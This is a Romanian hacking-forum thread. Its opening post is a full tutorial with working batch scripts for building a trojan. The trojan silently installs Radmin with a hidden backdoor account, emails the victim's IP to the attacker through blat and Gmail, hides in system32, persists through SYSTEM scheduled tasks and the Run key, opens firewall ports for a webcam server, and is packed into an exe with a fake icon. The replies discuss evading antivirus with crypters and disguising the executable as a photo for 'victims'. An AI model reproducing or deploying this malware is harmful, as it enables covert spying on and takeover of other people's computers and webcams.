SenatoR_v Posted February 17, 2011 Report Posted February 17, 2011 (edited) In tutorialul urmator am sa va arat cum facem un tojan cu care sa avem remote desktop,cmd,remote file(radmin) sa avem acces si la web camera + ip-ul victimei sa ne vina pe mail Downloadam Radmin 3Îl face instal cu un cadru lini?tit ?i ad?ugam unu utilizator nou prin intermediul registruluiPentru aceasta trebuie s? facem un fisier .batradmin_install.bat@echo off::Deschide instal radmin linistit fara a face restartstart msiexec.exe /i "radmin.msi" /quiet /norestart::Prin aceasta ascundem iconulreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server" /v HideTrayIcon /t REG_DWORD /d 1 /f::Verificam daca nu a mai fost instalat radmin cu un alt userFor /F "tokens=1" %%a in ('reg query "HKLM\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1"') do set regpath=%%a If DEFINED regpath (goto make_user2) Else (goto add_user)::Daca a fost, cream un user nou:make_user2echo Windows Registry Editor Version 5.00 > log_pass.regecho. >> log_pass.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\10] >> log_pass.regcopy /b log_pass.reg + user.txtreg import log_pass.reg && del log_pass.regexit::Daca nu a fost il facem noi pe primul:add_userecho Windows Registry Editor Version 5.00 > log_pass.regecho. >> log_pass.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1] >> log_pass.regcopy /b log_pass.reg + user.txtreg import log_pass.reg && del log_pass.regexitAceasta creeaz? un fi?ier de registru pentru utilizatorEste necesar s? se fac? un fi?ier text cu numele de utilizator ?i parolauser.txt"1"=hex:10,00,00,08,75,00,73,00,65,00,72,00,30,00,01,00,98,47,fc,7e,0f,89,1d,\ fd,5d,02,f1,9d,58,7d,8f,77,ae,c0,b9,80,d4,30,4b,01,13,b4,06,f2,3e,2c,ec,58,\ ca,fc,a0,4a,53,e3,6f,b6,8e,0c,3b,ff,92,cf,33,57,86,b0,db,e6,0d,fe,41,78,ef,\ 2f,cd,2a,4d,d0,99,47,ff,d8,df,96,fd,0f,9e,29,81,a3,2d,a9,55,03,34,2e,ca,9f,\ 08,06,2c,bd,d4,ac,2d,7c,df,81,0d,b4,db,96,db,70,10,22,66,26,1c,d3,f8,bd,d5,\ 6a,10,2f,c6,ce,ed,bb,a5,ea,e9,9e,61,27,bd,d9,52,f7,a0,d1,8a,79,02,1c,88,1a,\ e6,3e,c4,b3,59,03,87,f5,48,59,8f,2c,b8,f9,0d,ea,36,fc,4f,80,c5,47,3f,db,6b,\ 0c,6b,db,0f,db,af,46,01,f5,60,dd,14,91,67,ea,12,5d,b8,ad,34,fd,0f,d4,53,50,\ de,c7,2c,fb,3b,52,8b,a2,33,2d,60,91,ac,ea,89,df,d0,6c,9c,4d,18,f6,97,24,5b,\ d2,ac,92,78,b9,2b,fe,7d,ba,fa,a0,c4,3b,40,a7,1f,19,30,eb,c4,fd,24,c9,e5,a2,\ e5,a4,cc,f5,d7,f5,15,44,d7,0b,2b,ca,4a,f5,b8,d3,7b,37,9f,d7,74,0a,68,2f,40,\ 00,00,01,05,50,00,00,20,70,8d,ff,a4,d4,0d,97,d4,4f,61,1d,07,fa,48,2d,cc,f7,\ 9f,a6,89,b5,12,3c,08,f9,cf,9c,9e,7b,56,aa,d8,60,00,01,00,5c,c7,67,0b,48,c1,\ 01,cd,b6,91,ff,aa,d1,11,a8,ab,9b,e5,97,07,44,05,ef,44,4b,96,a1,ac,d0,5e,13,\ 88,cf,87,76,dc,e0,31,73,cf,35,3d,ef,e6,ba,9c,90,5d,e7,2b,7c,61,35,f6,87,0b,\ f0,8d,9f,a2,78,21,27,e2,0c,8c,1b,76,59,25,78,5b,9c,18,26,db,47,5f,13,b7,40,\ bd,3d,17,49,34,f5,c4,60,81,f7,0c,7c,c5,2a,c6,57,a6,52,8d,ed,75,71,c1,26,d4,\ a2,79,e6,f9,18,13,f1,e6,55,ba,06,6c,ba,b5,4c,7a,1f,e4,96,16,5a,4b,1b,42,91,\ dd,8b,c1,aa,45,b8,15,8b,2d,be,c2,08,8a,24,5f,97,1b,7c,9f,8c,8e,5c,83,ee,83,\ ac,f3,3b,c8,36,aa,f4,12,0f,8e,43,05,e5,a6,23,80,14,1c,dd,df,cf,2b,c5,3c,ef,\ c4,84,60,87,f2,82,a1,e0,b9,53,d2,af,e6,1c,30,91,46,55,b9,18,de,54,42,86,3f,\ 18,4e,cc,8d,6e,35,e9,9c,b2,04,21,c5,75,4d,17,eb,f8,78,b2,f9,11,4a,23,2c,97,\ 49,64,14,01,76,63,1a,5e,50,e2,bc,91,9f,4b,c0,b1,95,0d,4e,49,46,04,c4,9d,71,\ 20,00,00,04,ff,01,00,00 La sfirsit neaparat trebue sa fie 2 lini goale.Asa arata login si parola utilizatorului hexat.Aici sunt urmatoarele date:Login: userParola: radminuserDeasemena puteti sa adaugati un utilizator cu ce date doriti Pentru asta, instalati radmin 3 si creativa un user cu parola..Dupa care exportati fisierul: HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Par ameters\Radmin Security\1Va fi aceiasi ca user.txt numai ca cu datele utilizatorului creat de voi:)Acum noi avem:1) radmin.msi2) radmin_install.bat3) user.txtEste de dorit sa le lipim pe toate impreuna cu ajutorul programului: bat_to_exe converterConfiguram similar ca in imagine Ne ducem la include urcam celelalte 2 fisiere(radmin.msi ? user.txt)Facem clic pe CompileCu Radminulo am terminat!Ip pe mailDaca victima noastra are internet 3G la fiecare conectare la internet este posibil sa i se schimbe ip-ul asa ca va propun sa folositi optiunea "Ping" care la fiecare conectare raporteaza pe mail daca victima are alt ip.Incepem cu WinVer(Joaca un rol important)WinVer.bat@echo off:: Vedem ce fel de windows e instalatfor /f "tokens=2*" %%a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName ^| find "ProductName"') do set ProductName=%%bif "%ProductName%" == "Microsoft Windows 2000" (goto IP)if "%ProductName%" == "Microsoft Windows XP" (goto IP)if "%ProductName%" == "Windows Vista Ultimate" (goto IPv4)if "%ProductName%" == "Windows Vista Enterprise" (goto IPv4)if "%ProductName%" == "Windows Vista Business" (goto IPv4)if "%ProductName%" == "Windows Vista Home Premium" (goto IPv4)if "%ProductName%" == "Windows Vista Home Basic" (goto IPv4)if "%ProductName%" == "Windows Vista Starter" (goto IPv4)if "%ProductName%" == "Windows Vista Ultimate" (goto IPv4)if "%ProductName%" == "Windows Vista Enterprise" (goto IPv4)if "%ProductName%" == "Windows Vista Business" (goto IPv4)if "%ProductName%" == "Windows Vista Home Premium" (goto IPv4)if "%ProductName%" == "Windows Vista Home Basic" (goto IPv4)if "%ProductName%" == "Windows Vista Starter" (goto IPv4)if "%ProductName%" == "Windows 7 Ultimate" (goto IPv4)if "%ProductName%" == "Windows 7 Enterprise" (goto IPv4)if "%ProductName%" == "Windows 7 Professional" (goto IPv4)if "%ProductName%" == "Windows 7 Home Premium" (goto IPv4)if "%ProductName%" == "Windows 7 Home Basic" (goto IPv4)if "%ProductName%" == "Windows 7 Starter" (goto IPv4)if "%ProductName%" == "%ProductName%" (goto IP):: Dac e ?? sau 2000 Vom folosi IP:IPecho start /d sysfiles\ send_IP.exe >> ..\ping.batecho exit >> ..\ping.batschtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\ping.batschtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\sysfiles\send_IP.exe"del send_IPv4.exeexit:: Daca e ?? sau 2000 vom folosi IPv4:IPv4echo start /d sysfiles\ send_IPv4.exe >> ..\ping.batecho exit >> ..\ping.batschtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\ping.bat /fschtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\sysfiles\send_IPv4.exe" /fdel send_IP.exeexitDaca veti folosi "Ping", atunci stergeti textul marcat cu rosuDaca nu veti folosi "Ping",atunci stergeti textul marcat cu albastruInsusi Pingul pentru verificarea ip-ului.Ping.bat@echo offping ya.ru -n 5 >nulif %errorlevel%==0 (goto send) else (goto end):endexit:sendLa sfirsit neaparat trebue sa fie un rind gol.Mergem mai departe.Neaparat ferificam schimbarea si trimiterea ip-ului pe mail.Send_IP.bat@echo offset mail=blat.exe send.txt -to mailul_vostru@gmail.comif not exist ip1.txt (if not exist ip3.txt del ip3.txt 3.txt & ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IP" ip1.txt >> 1.txt) else (goto test1):test1if exist ip2.txt (goto test2) else (ipconfig /all > ip2.txt & Echo %COMPUTERNAME% > 2.txt & findstr "IP" ip2.txt >> 2.txt)del ip3.txt 3.txtfc 1.txt 2.txtIF %ERRORLEVEL% == 1 (copy /y 2.txt send.txt | %mail%)exit:test2if exist ip3.txt (goto test3) else (ipconfig /all > ip3.txt & Echo %COMPUTERNAME% > 3.txt & findstr "IP" ip3.txt >> 3.txt)del ip1.txt 1.txtfc 2.txt 3.txtIF %ERRORLEVEL% == 1 (copy /y 3.txt send.txt | %mail%)exit:test3if exist ip1.txt (goto test1) else (ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IP" ip1.txt >> 1.txt)del ip2.txt 2.txtfc 3.txt 1.txtIF %ERRORLEVEL% == 1 (copy /y 1.txt send.txt | %mail%)exitSend_IPv4.bat@echo offset mail=blat.exe send.txt -to mailul_vostru@gmail.comif not exist ip1.txt (if not exist ip3.txt del ip3.txt 3.txt & ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IPv4" ip1.txt >> 1.txt) else (goto test1):test1if exist ip2.txt (goto test2) else (ipconfig /all > ip2.txt & Echo %COMPUTERNAME% > 2.txt & findstr "IPv4" ip2.txt >> 2.txt)del ip3.txt 3.txtfc 1.txt 2.txtIF %ERRORLEVEL% == 1 (copy /y 2.txt send.txt | %mail%)exit:test2if exist ip3.txt (goto test3) else (ipconfig /all > ip3.txt & Echo %COMPUTERNAME% > 3.txt & findstr "IPv4" ip3.txt >> 3.txt)del ip1.txt 1.txtfc 2.txt 3.txtIF %ERRORLEVEL% == 1 (copy /y 3.txt send.txt | %mail%)exit:test3if exist ip1.txt (goto test1) else (ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IPv4" ip1.txt >> 1.txt)del ip2.txt 2.txtfc 3.txt 1.txtIF %ERRORLEVEL% == 1 (copy /y 1.txt send.txt | %mail%)exitDeci avem urmatoarele fisiere.WinVer.batSend_IP.batSend_IPv4.batDeasemenea le lipim cu ajutorul programului Bat To Exe Converter cu urmatoarele configuratii.Ping.bat il lasam asa cum esteRaportul il va trimite programul BlatSi cu asta terminam.Acum a ramas cea mai interesanta parte sa creem chiar instalul.Principalu este sa nu te incurci Install.bat@ECHO OFF:: Este necesara pentra ca consola sa inteleaga caracterele rusesti si sa ascunda dosarul Radmin din meniu start.reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v CodePage /t REG_DWORD /d 1251 /freg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FaceName /t REG_SZ /d "Lucida Console" /freg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontFamily /t REG_DWORD /d 0x0000036 /freg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontSize /t REG_DWORD /d 0x000c0000 /freg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontWeight /t REG_DWORD /d 0x00002bc /f::Deschidem radminul nostru pregatitstart radmin_install.exe::Creem foldere pentru pastrarea fisierelormkdir %systemroot%\system32\sysfilesmkdir %SystemRoot%\system32\sysfiles\server::Extragem fi?ierele ?i copiam în directorul necesarecopy /y "blat.exe" "%SystemRoot%\system32\sysfiles\blat.exe"copy /y "blat.lib" "%SystemRoot%\system32\sysfiles\blat.lib"copy /y "blat.dll" "%SystemRoot%\system32\sysfiles\blat.dll"copy /y "send_IP.exe" "%SystemRoot%\system32\sysfiles\send_IP.exe"copy /y "send_IPv4.exe" "%SystemRoot%\system32\sysfiles\send_IPv4.exe"copy /y "winver.exe" "%SystemRoot%\system32\sysfiles\winver.exe"copy /y "ping.bat" "%SystemRoot%\system32\ping.bat"copy /y "cam_server.exe" "%SystemRoot%\system32\sysfiles\server\cam_server.exe"::Adaugam exceptie FireWall-uinetsh firewall add allowedprogram "%SystemRoot%\system32\sysfiles\server\cam_server.exe" "cam_server" ENABLEnetsh firewall add portopening tcp 57011 all::Facem configurarea Blat pentri trimiterea pe mail"%SystemRoot%\system32\sysfiles\blat.exe" -install -server smtp.gmail.com -port 587 -f mailul@gmail.com -u Login -pw Parola::Il deschidem odata cu Windowsu-ulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\system32\sysfiles\server\cam_server.exe pass=Parola port=57011" /f::Prima trimitere de IP indata dupa rulareipconfig /all > %SystemRoot%\system32\sysfiles\ip1.txt & Echo %COMPUTERNAME% > %SystemRoot%\system32\sysfiles\1.txt & findstr "IP" %SystemRoot%\system32\sysfiles\ip1.txt >> %SystemRoot%\system32\sysfiles\1.txt"%SystemRoot%\system32\sysfiles\blat.exe" "%SystemRoot%\system32\sysfiles\1.txt" -to mailul vostru@gmail.com::Deschide WinVer care ne arata ce mod de trimitere a IP-ului se va utilizacd %SystemRoot%\system32\sysfiles\start winver.exe::Deschidem serverul Web camereicd %SystemRoot%\system32\sysfiles\serverstart cam_server.exe pass=PAROLA port=57011::Stergem ce e de prisosrmdir /s /q "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Radmin Server 3"rmdir /s /q "c:\Documents and Settings\%username%\??????? ????\?????????\Radmin Server 3"del /q "%SystemRoot%\system32\sysfiles\winver.exe"exitDaca nu folositi RemCam doar stergeti rindurile unde se intilneste.DownloadamRemCam(In arhiva este si server si client)Aproape totDin nou ne lipim organele cu ajutorul Bat To Exe ConverterRespectind configuratile din imagineMergem in fila include si din nou adaugam urmatoarele fisiere:ping.bat (Daca il veti folosi)send_IP.exesend_IPv4.exeWinVer.exeradmin_install.execam_server.exe (Daca il veti folosi)blat.exeblat.dllblat.libDownload all bat filesblatApoi mergem in fila Versioninformations si bagam un icon si ne bucuram de Trojan Credite:SenatoR Edited March 1, 2011 by SenatoR_v Quote
drakeRizz Posted February 17, 2011 Report Posted February 17, 2011 direct copy paste si ceva translate de la rusi, mai bine nu mai dateai credite,si pana la urma de ce ai face toate astea cand poti instala un RAT ? Quote
SenatoR_v Posted February 17, 2011 Author Report Posted February 17, 2011 1.Un asemenea tutorial este pe xakepok si acela e scris de varul meu + ca era altfel, acest tutorial deodata a fost creat pentru forumul rus xakepok de catre mine si nu cred ca imi ia cineva creditele!2.MAI INVETI CEVA CITIND TOT DIN EL NU STAI SI TE UITI CUM SPY NET SU ETC.. ISI FAC TREABA DAR TU NICI NAI IDEIE CE AU FACUT! Quote
un_stra1n Posted February 18, 2011 Report Posted February 18, 2011 cum putem face trojanul nedetectabil? de avira ma intereseaza?? si ce fisier trebuie sa trimit la victima? si care e faza cu RAT? e mai simplu? Quote
SenatoR_v Posted February 18, 2011 Author Report Posted February 18, 2011 (edited) plm rat-ul e ce formezi la urma!Si nedetectabil de avira il faci daca ii schimbi iconul! Edited February 19, 2011 by SenatoR_v Quote
drakeRizz Posted February 24, 2011 Report Posted February 24, 2011 e clar...senator te cheama. bafta cu soarecii tai , sau ce sunt astia. Quote
nicusor.ilie Posted March 1, 2011 Report Posted March 1, 2011 1) Multumesc pentru tutorial.2) Si cum se schimba icon-ul (ca sa fie nedectabil)?3) Toate arhivele sunt corupte! Eu nu le pot deschide (cu winrar). Rog pe proprietar sua cine le are sa le reposteze. Multumesc4) Cum se procedeaza daca victima are si un Zona Alarnm instalat? Si un rpouter wireless?5) Se poate pune in loc de radmin, orice program (de rempote control) (gen VNC)?Multumesc Quote
fabio_livese Posted March 3, 2011 Report Posted March 3, 2011 ma poate ajuta cineva cu niste remote`uri?contracost bineinteles Quote
vaio Posted March 13, 2011 Report Posted March 13, 2011 Eu sunt mai batut in cap de fel. Imi poti explica mai ca la prosti ce trimit "victimei" si ce folosesc eu ? Stiu ca radmin o sa folosesc dar inafara de el, eu mai trebuie sa instalez vreun .bat ceva ? Multumesc ! Quote
Laurix Posted April 28, 2011 Report Posted April 28, 2011 Citeste cu atentie si ai sa vezi ce trebuie sa faci . Quote
MagicThunder Posted April 28, 2011 Report Posted April 28, 2011 Sunteti chiar inapti ca sa zic asa.Tutorialul e facut mura in gura explicat "ca la prosti" iti da toate detaliile+ toate fisierele de care ai nevoi.Daca ai imaginatie poti aplica tutorialul asta si la alte RAT-uri.Pentru a nu fi detectat de antivirus e recomandabil sa aveti un Crypter bun + sa nu il scanati cu antivirusul pentru a fi luat in baza de date.@un_stra1n la victima ii trimiti serverul si un_senator:)) "Si nedetectabil de avira il faci daca ii schimbi iconul!" aici m-ai dat pe spate:))pai daca i-ai schimba doar iconul la ce mai trebuie criptat?Cum ziceam:puteti sa adaptati tutorialul si la alte rat-uri.Sky is the limit! Quote
andrew-46 Posted April 29, 2011 Report Posted April 29, 2011 Nu ca as fi eu mare expert dar am facut ce ai explicat tu mai sus fara prea mari complicatii, cu bat to exe converter, o poza, un server de radmin, un .vbs, si un .bat... Pentru ip-ul pe mail am folosit site-ul How to find someones IP address si ce face .vbs-ul e sa deschida adresa aia pe care am primit-o in IE (fereastra invizibila)... Oricum in final am ramas doar cu un executabil, cu icoana de JPG care chiar deschide o poza cand este executat... Quote
proxyy Posted January 2, 2014 Report Posted January 2, 2014 la prima parte care e fisieru radmin.msi ? Quote